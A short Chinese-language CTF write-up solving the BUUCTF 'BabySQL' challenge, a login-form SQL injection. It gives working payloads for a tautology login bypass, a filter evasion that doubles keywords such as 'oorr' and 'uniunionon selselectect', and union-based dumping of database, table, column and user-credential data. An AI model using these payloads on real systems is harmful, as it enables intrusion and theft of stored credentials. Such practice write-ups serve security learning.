极客大挑战2019-BabySQL

 · 2020-7-6  ·次阅读


​ 题目地址:buuctf

1

尝试admin登录

2

然后尝试利用admin’or 1 = 1#

3

显然or被过滤了,

这里用双写绕过admin’oorr 1 = 1#成功

4

username=u’uniunionon selselectect 1,2,3#&password=p

5

得到2,3列,接下来爆库得到geek

u’uniunionon selselectect 1,2,database()#&password=p

6

username=u’uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#&password=p

得到两个表名’b4bsql,geekuser’

7

username=u’uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=’geekuser’#&password=p

得到三个字段id,username,password

8

username=u’uniunionon selselectect 1,2,group_concat(id,username,passwoorrd) frfromom geekuser#&password=p

9

没有发现flag

重复操作在b4bsql表中发现flag